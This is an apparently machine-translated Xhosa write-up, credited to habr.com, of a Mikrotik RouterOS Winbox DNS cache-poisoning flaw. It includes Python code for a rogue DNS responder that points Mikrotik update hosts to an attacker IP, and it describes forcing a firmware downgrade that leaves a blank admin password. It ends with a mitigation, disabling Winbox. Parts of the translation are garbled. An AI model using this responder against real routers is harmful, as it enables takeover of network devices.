Ukukwazi ukunciphisa kude izixhobo ezisekelwe kwi-RouterOS (Mikrotik) ibeka amakhulu amawaka ezixhobo zenethiwekhi emngciphekweni. Ukuba sesichengeni kunxulunyaniswa netyhefu ye-DNS cache yeWinbox protocol kwaye ikuvumela ukuba ulayishe yakudala (ngokusetha kwakhona igama elimiselweyo) okanye i-firmware elungisiweyo kwisixhobo.
Iinkcukacha zokuba sesichengeni
I-terminal ye-RouterOS ixhasa umyalelo wokusombulula ukujongwa kwe-DNS.
Esi sicelo siphathwa ngokubini okubizwa ngokuba ngumxazululi. Isisombululi sesinye sezibini ezininzi ezinxibelelana neprotocol ye-Winbox ye-RouterOS. Kwinqanaba eliphezulu, "imiyalezo" ethunyelwe kwizibuko leWinbox ingahanjiswa kwiibini ezahlukeneyo kwi-RouterOS esekwe kuluhlu olusekwe kuluhlu lwenani lwenkqubo.
Ngokungagqibekanga, i-RouterOS inesici seseva ye-DNS icinyiwe.
Nangona kunjalo, nangona umsebenzi womncedisi uvaliwe, i-router igcina i-cache ye-DNS yayo.
Xa senza isicelo sisebenzisa i-winbox_dns_request umzekelo.com, i-router iya kubamba umphumo.
Kuba sinokukhankanya iseva ye-DNS apho isicelo kufuneka siye khona, ukufaka iidilesi ezingachanekanga kuyinto encinci. Umzekelo, ungaqwalasela ukuphunyezwa komncedisi we DNS ukusuka ukuhlala uphendula ngerekhodi A equlethe idilesi ye-IP 192.168.88.250.
def dns_response(data):
request = DNSRecord.parse(data)
reply = DNSRecord(DNSHeader(
id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
print("---- Reply:n", reply)
return reply.pack()Ngoku ukuba ukhangela umzekelo.com usebenzisa iWinbox, unokubona ukuba i-DNS cache ye-router inetyhefu.
Ewe kunjalo, ityhefu i-example.com ayiloncedo kakhulu kuba i-router ayiyi kuyisebenzisa ngokwenene. Nangona kunjalo, i-router idinga ukufikelela kwi-upgrade.mikrotik.com, cloud.mikrotik.com, cloud2.mikrotik.com kunye ne-download.mikrotik.com. Kwaye enkosi kwenye impazamo, kunokwenzeka ukutyhefa zonke ngaxeshanye.
def dns_response(data):
request = DNSRecord.parse(data)
reply = DNSRecord(DNSHeader(
id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
reply.add_answer(RR("upgrade.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("cloud.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("cloud2.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("download.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
print("---- Reply:n", reply)
return reply.pack()I-router icela imvume enye, kwaye sinikezela ezintlanu emva. I-router ayigcini zonke ezi mpendulo ngokuchanekileyo.
Ngokucacileyo, olu hlaselo lukwaluncedo ukuba i-router isebenza njengeseva ye-DNS, kuba ivumela abathengi be-router ukuba bahlaselwe.
Olu hlaselo lukwakuvumela ukuba usebenzise ubungozi obunzulu: ukuthoba okanye ukubuyisela umva inguqulelo ye-RouterOS. Umhlaseli uphinda enze ingqiqo yomncedisi wohlaziyo, kuquka i-changelog, kwaye inyanzela i-RouterOS ukuba ibone inguqulo yakudala (esichengeni) njengangoku. Ingozi apha ixhomekeke kwinto yokuba xa inguqulelo "ihlaziywa", igama eliyimfihlo lomlawuli lisetyenzisiwe kwixabiso elingagqibekanga - umhlaseli unokungena kwinkqubo ngephasiwedi engenanto!
Uhlaselo lusebenza kakhulu, nangona kunjalo iphumeza iivektha ezininzi, kuquka nezo zinxulumene , kodwa le sele ibubuchule obungafunekiyo kwaye ukusetyenziswa kwayo ngeenjongo ezingekho mthethweni akukho mthethweni.
ΠΠ°ΡΠΈΡΠ°
Ukuvala nje iWinbox kukuvumela ukuba uzikhusele kolu hlaselo. Ngaphandle koncedo lolawulo ngeWinbox, kungcono ukusebenzisa iSSH protocol.
umthombo: www.habr.com